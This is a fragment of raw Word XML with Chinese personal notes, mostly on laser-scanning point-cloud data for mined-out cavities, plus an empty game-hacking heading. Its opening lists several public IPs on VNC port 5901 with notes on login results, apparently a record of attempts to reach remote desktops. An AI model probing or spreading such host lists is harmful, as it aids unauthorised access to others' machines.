        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">66.201.41.31:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">66.201.41.33:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.173.226.124:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>66.201.41.28:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要密码进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2114550" cy="1400175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="204" name="图片 204" descr="说明: C:\Users\Administrator\AppData\Roaming\Tencent\Users\1415532825\QQ\WinTemp\RichOle\OPVLQI~_8{A5~GYY`)N5%6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9" descr="说明: C:\Users\Administrator\AppData\Roaming\Tencent\Users\1415532825\QQ\WinTemp\RichOle\OPVLQI~_8{A5~GYY`)N5%6S.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14550" cy="1400175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>游戏找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00B27865" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点云数据处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基础</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>激光探测技术</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00E87972" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E87972">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>采空区三维激光扫系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00E87972">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(C-ALS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023446F">
        <w:t>3D</w:t>
      </w:r>
      <w:r w:rsidRPr="0023446F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>激光探测技术</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>是对空区的整体或局部进行完整的三维坐标数据探测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>在三维空间进行</w:t>
      </w:r>
      <w:r w:rsidRPr="009509DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>从左到右</w:t>
      </w:r>
      <w:r w:rsidRPr="009509DC">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="009509DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>从上到下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>的全自动高精度步进扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>进而得到完整的、全面的、连续的、关联的全景点坐标数据——“点云”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>从而真实地描述出目标的整体结构及形态特性。通过扫描探测点云编织出的</w:t>
      </w:r>
      <w:r w:rsidRPr="009509DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>“外皮”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>来逼近目标的完整原形及矢量化数据结构</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>可进行目标的三维重建。然后由全面的</w:t>
      </w:r>
      <w:r w:rsidRPr="009509DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>后处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>可获取复杂的几何内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>如长度、距离、体积、面积、目标结构形变、结构位移及变化关系等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>扫描探测数据与实际数据的关系</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3537585</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>183515</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="307975" cy="497205"/>
                <wp:effectExtent l="0" t="0" r="15875" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="463" name="文本框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75" cy="497205"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w:rsidR="00830594" w:rsidRDefault="00830594" w:rsidP="00D35B8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463" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:278.55pt;margin-top:14.45pt;width:24.25pt;height:39.1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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00830594" w:rsidRDefault="00830594" w:rsidP="00D35B85"/>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设备输出格式：依次是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A,B,L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A,B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是角度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为长度，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即代表测点，示意图如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>900430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6350</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="307975" cy="497205"/>
                <wp:effectExtent l="0" t="0" r="15875" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="462" name="文本框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75" cy="497205"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w:rsidR="00830594" w:rsidRDefault="00830594" w:rsidP="00D35B85"/>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462" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:70.9pt;margin-top:.5pt;width:24.25pt;height:39.1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" strokecolor="white">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00830594" w:rsidRDefault="00830594" w:rsidP="00D35B85"/>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908685</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>173990</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="45085" cy="45085"/>
                <wp:effectExtent l="0" t="0" r="12065" b="12065"/>
                <wp:wrapNone/>
                <wp:docPr id="461" name="椭圆 4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085" cy="4508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椭圆 461" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:71.55pt;margin-top:13.7pt;width:3.55pt;height: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" fillcolor="#4f81bd" strokecolor="#385d8a" strokeweight="2pt">
                <v:path arrowok="t"/>
              </v:oval>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748665</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>109855</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2785110" cy="318770"/>
                <wp:effectExtent l="0" t="76200" r="0" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="460" name="直接箭头连接符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785110" cy="31877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460" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;left:0;text-align:left;margin-left:58.95pt;margin-top:8.65pt;width:219.3pt;height:25.1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" strokecolor="#4a7ebb">
                <v:stroke endarrow="open"/>
                <o:lock v:ext="edit" shapetype="f"/>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897255</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>170815</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="10160" cy="2168525"/>
                <wp:effectExtent l="0" t="0" r="27940" b="22225"/>
                <wp:wrapNone/>
                <wp:docPr id="459" name="直接连接符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160" cy="2168525"/>
                        </a:xfrm>
                        <a:prstGeom prst="line">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                          <a:solidFill>
                            <a:srgbClr val="4F81BD">
                              <a:shade val="95000"/>
                              <a:satMod val="105000"/>
                            </a:srgbClr>
                          </a:solidFill>
                          <a:prstDash val="lgDash"/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:bodyPr/>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
                <wp14:sizeRelH relativeFrom="page">
                  <wp14:pctWidth>0</wp14:pctWidth>
                </wp14:sizeRelH>
                <wp14:sizeRelV relativeFrom="page">
                  <wp14:pctHeight>0</wp14:pctHeight>
                </wp14:sizeRelV>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:line id="直接连接符 459" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:lef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65pt,13.45pt" to="71.45pt,18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" strokecolor="#4a7ebb">
                <v:stroke dashstyle="longDash"/>
                <o:lock v:ext="edit" shapetype="f"/>
              </v:lin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00965</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>173990</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="807720" cy="1360170"/>
                <wp:effectExtent l="0" t="0" r="30480" b="30480"/>
                <wp:wrapNone/>
                <wp:docPr id="458" name="直接连接符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7720" cy="136017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458"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5pt,13.7pt" to="71.55pt,1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">
                <o:lock v:ext="edit" shapetype="f"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114298" distR="114298" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>100964</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>57150</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="0" cy="1456690"/>
                <wp:effectExtent l="95250" t="38100" r="57150" b="10160"/>
                <wp:wrapNone/>
                <wp:docPr id="457" name="直接箭头连接符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45669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直接箭头连接符 457" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;left:0;text-align:left;margin-left:7.95pt;margin-top:4.5pt;width:0;height:114.7pt;flip:y;z-index:2516623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" strokecolor="#4a7ebb">
                <v:stroke endarrow="open"/>
                <o:lock v:ext="edit" shapetype="f"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1748155</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>193040</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="308610" cy="497205"/>
                <wp:effectExtent l="0" t="0" r="15240" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="307" name="文本框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497205"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w:rsidR="00830594" w:rsidRDefault="00830594" w:rsidP="00D35B8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307" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:137.65pt;margin-top:15.2pt;width:24.3pt;height:39.1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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00830594" w:rsidRDefault="00830594" w:rsidP="00D35B85"/>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>483235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>121920</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1264920" cy="605155"/>
                <wp:effectExtent l="0" t="38100" r="49530" b="23495"/>
                <wp:wrapNone/>
                <wp:docPr id="456" name="直接箭头连接符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64920" cy="60515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直接箭头连接符 456" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;left:0;text-align:left;margin-left:38.05pt;margin-top:9.6pt;width:99.6pt;height:47.6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" strokecolor="#4a7ebb">
                <v:stroke endarrow="open"/>
                <o:lock v:ext="edit" shapetype="f"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>313055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>38100</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31750" cy="499745"/>
                <wp:effectExtent l="38100" t="76200" r="177800" b="90805"/>
                <wp:wrapNone/>
                <wp:docPr id="455" name="曲线连接符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750" cy="499745"/>
                        </a:xfrm>
                        <a:prstGeom prst="curvedConnector3">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 583096"/>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455" o:spid="_x0000_s1026" type="#_x0000_t38" style="position:absolute;left:0;text-align:left;margin-left:24.65pt;margin-top:3pt;width:2.5pt;height:39.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" adj="125949" strokecolor="#4a7ebb">
                <v:stroke startarrow="open" endarrow="open"/>
                <o:lock v:ext="edit" shapetype="f"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>100965</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>126365</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2456180" cy="10795"/>
                <wp:effectExtent l="0" t="76200" r="20320" b="103505"/>
                <wp:wrapNone/>
                <wp:docPr id="454" name="直接箭头连接符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56180" cy="1079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直接箭头连接符 454" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;left:0;text-align:left;margin-left:7.95pt;margin-top:9.95pt;width:193.4pt;height:.8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" strokecolor="#4a7ebb">
                <v:stroke endarrow="open"/>
                <o:lock v:ext="edit" shapetype="f"/>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39395</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>147320</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="159385" cy="117475"/>
                <wp:effectExtent l="38100" t="38100" r="50165" b="53975"/>
                <wp:wrapNone/>
                <wp:docPr id="453" name="直接箭头连接符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59385" cy="117475"/>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直接箭头连接符 453" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;left:0;text-align:left;margin-left:18.85pt;margin-top:11.6pt;width:12.55pt;height:9.25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" strokecolor="#4a7ebb">
                <v:stroke startarrow="open" endarrow="open"/>
                <o:lock v:ext="edit" shapetype="f"/>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908685</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>126365</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="212725" cy="829310"/>
                <wp:effectExtent l="0" t="0" r="34925" b="27940"/>
                <wp:wrapNone/>
                <wp:docPr id="452" name="直接连接符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2725" cy="829310"/>
                        </a:xfrm>
                        <a:prstGeom prst="line">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                          <a:solidFill>
                            <a:srgbClr val="4F81BD">
                              <a:shade val="95000"/>
                              <a:satMod val="105000"/>
                            </a:srgbClr>
                          </a:solidFill>
                          <a:prstDash val="dashDot"/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:bodyPr/>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
                <wp14:sizeRelH relativeFrom="page">
                  <wp14:pctWidth>0</wp14:pctWidth>
                </wp14:sizeRelH>
                <wp14:sizeRelV relativeFrom="page">
                  <wp14:pctHeight>0</wp14:pctHeight>
                </wp14:sizeRelV>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:line id="直接连接符 452" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:lef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55pt,9.95pt" to="88.3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" strokecolor="#4a7ebb">
                <v:stroke dashstyle="dashDot"/>
                <o:lock v:ext="edit" shapetype="f"/>
              </v:lin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100965</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>126365</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="797560" cy="829310"/>
                <wp:effectExtent l="0" t="0" r="21590" b="27940"/>
                <wp:wrapNone/>
                <wp:docPr id="451" name="直接连接符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7560" cy="829310"/>
                        </a:xfrm>
                        <a:prstGeom prst="line">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                          <a:solidFill>
                            <a:srgbClr val="4F81BD">
                              <a:shade val="95000"/>
